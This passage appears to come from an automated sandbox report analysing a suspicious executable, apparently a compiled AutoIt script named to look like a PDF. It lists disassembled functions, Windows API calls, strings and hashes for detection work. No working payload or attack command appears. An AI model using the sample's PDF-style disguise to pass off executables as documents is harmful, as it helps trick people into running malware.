                                                    • Instruction ID: 6f339d26bf3c7a0734b8863c596734635a60832793add35a6e293d3723c2c10b
                                                    • Opcode Fuzzy Hash: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
                                                    • Instruction Fuzzy Hash: 038191310083059BDB22DF14C985FAA7BE8FF85314F058469FD8A9A095DB38ED45CBA1
                                                    Function 0037D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 2c09ba05259beb14da67422457a383d306be705c64c03e0d1dbcf50555e6b0fb
                                                    • Instruction ID: 0e1d5a19953cf04874f210f86645aed5cf8457dbc5ed8036970a851c52185ee9
                                                    • Opcode Fuzzy Hash: 2c09ba05259beb14da67422457a383d306be705c64c03e0d1dbcf50555e6b0fb
                                                    • Instruction Fuzzy Hash: B7314F31A44209EADB2BEE50DE53EEE73B89F20710F204129F9557D0E5EB55AE04C652
                                                    Function 0037EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 0037EAB0
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0037EAC2
                                                    • SetWindowTextW.USER32(?,?), ref: 0037EAD9
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0037EAEE
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0037EAF4
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037EB04
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0037EB0A
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0037EB2B
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0037EB45
                                                    • GetWindowRect.USER32(?,?), ref: 0037EB4E
                                                    • SetWindowTextW.USER32(?,?), ref: 0037EBB9
                                                    • GetDesktopWindow.USER32 ref: 0037EBBF
                                                    • GetWindowRect.USER32(00000000), ref: 0037EBC6
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0037EC12
                                                    • GetClientRect.USER32(?,?), ref: 0037EC1F
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0037EC44
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0037EC6F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                                    • Instruction ID: 39cda3c6a697ca2337cc38e58a1171a5f9f2bc809f7184b0dccb1cb79b7dd885
                                                    • Opcode Fuzzy Hash: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                                    • Instruction Fuzzy Hash: C0513E71900709EFDB229FA8CD89F6EBBB9FF08705F014968E586A65A0C774B954CB10
                                                    Function 003979B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 003979C6
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 003979D1
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 003979DC
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 003979E7
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 003979F2
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 003979FD
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00397A08
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00397A13
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00397A1E
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00397A29
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00397A34
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00397A3F
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00397A4A
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00397A55
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00397A60
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00397A6B
                                                    • GetCursorInfo.USER32(?), ref: 00397A7B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$Info
                                                    • String ID:
                                                    • API String ID: 2577412497-0
                                                    • Opcode ID: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                                    • Instruction ID: 1b130968be9272ff62e6572bb23cec31e4df6dd993529a517a355476f572175b
                                                    • Opcode Fuzzy Hash: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                                    • Instruction Fuzzy Hash: 663105B1D4831A6ADF119FB68C8995FBFE8FF04750F50453AE50DE7281DA78A5008FA1
                                                    Function 0034C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0034C8B7,?,00002000,?,?,00000000,?,0034419E,?,?,?,003DDC00), ref: 0035E984
                                                      • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                                    • __wsplitpath.LIBCMT ref: 0034C93E
                                                      • Part of subcall function 00361DFC: __wsplitpath_helper.LIBCMT ref: 00361E3C
                                                    • _wcscpy.LIBCMT ref: 0034C953
                                                    • _wcscat.LIBCMT ref: 0034C968
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0034C978
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0034CABE
                                                      • Part of subcall function 0034B337: _wcscpy.LIBCMT ref: 0034B36F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 2258743419-1018226102
                                                    • Opcode ID: b7aede0a033ebdf18e471edac6fa4ce50b2360f41b6cd76307d5280ca7d2dd37
                                                    • Instruction ID: 2d3abcfc1a530c2cccd2077b6643a34c49ca3d99964cf7595693e0e1e50c7208
                                                    • Opcode Fuzzy Hash: b7aede0a033ebdf18e471edac6fa4ce50b2360f41b6cd76307d5280ca7d2dd37
                                                    • Instruction Fuzzy Hash: 461283715083419FC726EF24C841AAFBBE5FF99304F44492DF5899B261DB30EA49CB52
                                                    Function 003ACE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003ACEFB
                                                    • DestroyWindow.USER32(?,?), ref: 003ACF73
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003ACFF4
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003AD016
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD025
                                                    • DestroyWindow.USER32(?), ref: 003AD042
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003AD075
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD094
                                                    • GetDesktopWindow.USER32 ref: 003AD0A9
                                                    • GetWindowRect.USER32(00000000), ref: 003AD0B0
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003AD0C2
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003AD0DA
                                                      • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 3877571568-3619404913
                                                    • Opcode ID: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                                    • Instruction ID: c6e2130b3dc8896fd1a3756a632261699c0fab780b05e397009c2779a3256c7a
                                                    • Opcode Fuzzy Hash: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                                    • Instruction Fuzzy Hash: DB71DFB0140305AFD722CF28CC85FA677E9FB89704F44492DF9869B2A1DB35E942CB16
                                                    Function 003AF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DragQueryPoint.SHELL32(?,?), ref: 003AF37A
                                                      • Part of subcall function 003AD7DE: ClientToScreen.USER32(?,?), ref: 003AD807
                                                      • Part of subcall function 003AD7DE: GetWindowRect.USER32(?,?), ref: 003AD87D
                                                      • Part of subcall function 003AD7DE: PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF3E3
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003AF3EE
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003AF411
                                                    • _wcscat.LIBCMT ref: 003AF441
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003AF458
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF471
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF488
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF4AA
                                                    • DragFinish.SHELL32(?), ref: 003AF4B1
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003AF59C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 169749273-3440237614
                                                    • Opcode ID: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                                    • Instruction ID: c6baa9641be7134ff092253bb59d60627e2fd312a92699374e38bc11b0f64025
                                                    • Opcode Fuzzy Hash: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                                    • Instruction Fuzzy Hash: B1613C71508304AFC316DF64CC85D9FBBF8EF89710F404A2EF695961A1DB71A609CB52
                                                    Function 0038AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 0038AB3D
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0038AB46
                                                    • VariantClear.OLEAUT32(?), ref: 0038AB52
                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0038AC40
                                                    • __swprintf.LIBCMT ref: 0038AC70
                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0038AC9C
                                                    • VariantInit.OLEAUT32(?), ref: 0038AD4D
                                                    • SysFreeString.OLEAUT32(00000016), ref: 0038ADDF
                                                    • VariantClear.OLEAUT32(?), ref: 0038AE35
                                                    • VariantClear.OLEAUT32(?), ref: 0038AE44
                                                    • VariantInit.OLEAUT32(00000000), ref: 0038AE80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                    • API String ID: 3730832054-3931177956
                                                    • Opcode ID: 68c4677a7656bdc39471faefa22a585fd03b177c37790958bf25028799a136ca
                                                    • Instruction ID: d0464086f354161bffc2ede770456dc978555c60f9255d279da3cb452a3f9378
                                                    • Opcode Fuzzy Hash: 68c4677a7656bdc39471faefa22a585fd03b177c37790958bf25028799a136ca
                                                    • Instruction Fuzzy Hash: C7D1FE71A00B05DBEF23AF65C884B6AB7B9FF04700F1584A6E8059F590DB70EC44DBA2
                                                    Function 003A716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 003A71FC
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A7247
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                                    • Instruction ID: 9c89048318e965a8e0b3b03471a0f1eb01f4f4b0b3658b8309ec7472eaf7cafd
                                                    • Opcode Fuzzy Hash: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                                    • Instruction Fuzzy Hash: 7B915D342086019BCB16EF20C891A6EB7E5EF95310F01885DFD965F7A2DB35ED0ACB81
                                                    Function 0037CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumChildWindows.USER32(?,0037CF50), ref: 0037CE90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: 4+?$CLASS$CLASSNN$H+?$INSTANCE$L+?$NAME$P+?$REGEXPCLASS$T+?$TEXT
                                                    • API String ID: 3555792229-2490583668
                                                    • Opcode ID: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                                    • Instruction ID: 4a2bb34ad5da400e001ffca32fcc130f889408ea8bd9e6035e09632547b61d6a
                                                    • Opcode Fuzzy Hash: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                                    • Instruction Fuzzy Hash: 2191913061050AABCB2ADF60C481BEAFBB5BF04300F54D51DE95DAB551DF34A99ACBD0
                                                    Function 003AE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003AE5AB
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,003A9808,?), ref: 003AE607
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE647
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE68C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE6C3
                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,003A9808,?), ref: 003AE6CF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003AE6DF
                                                    • DestroyIcon.USER32(?), ref: 003AE6EE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003AE70B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003AE717
                                                      • Part of subcall function 00360FA7: __wcsicmp_l.LIBCMT ref: 00361030
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1212759294-1154884017
                                                    • Opcode ID: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                                    • Instruction ID: 742b4c65c9a6934e2c3ec08a649afd0fbad1888905ee502d16be8042959b6063
                                                    • Opcode Fuzzy Hash: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                                    • Instruction Fuzzy Hash: 1A61CF71500215BAEB26DF64CC46FBE77ACFB1A714F108615F915EA0E1EBB0E980CB60
                                                    Function 0038D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CharLowerBuffW.USER32(?,?), ref: 0038D292
                                                    • GetDriveTypeW.KERNEL32 ref: 0038D2DF
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D327
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D35E
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D38C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1148790751-4113822522
                                                    • Opcode ID: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                                    • Instruction ID: 3b827cb8fe581c93abc0ed1dc24a2966ddee087777841fbaad2400664db9bee8
                                                    • Opcode Fuzzy Hash: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                                    • Instruction Fuzzy Hash: 57514C755047059FC702EF11C88196EB7E8EF99714F10486DF886AB2A1DB71EE0ACB42
                                                    Function 003826BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?), ref: 003826F1
                                                    • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 003826FA
                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?,00000016), ref: 0038271C
                                                    • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 0038271F
                                                    • __swprintf.LIBCMT ref: 0038276F
                                                    • __swprintf.LIBCMT ref: 00382780
                                                    • _wprintf.LIBCMT ref: 00382829
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00382840
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 618562835-2268648507
                                                    • Opcode ID: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                                    • Instruction ID: 03e145cb53fb231d1b6e47cb7af041c1b680fbab1168300a674058b15c369d34
                                                    • Opcode Fuzzy Hash: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                                    • Instruction Fuzzy Hash: 1741EC72800219BACF16FBE0DD86DEEB7B8AF15340F500065B6057E092EA756F59CB61
                                                    Function 0038D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038D0D8
                                                    • __swprintf.LIBCMT ref: 0038D0FA
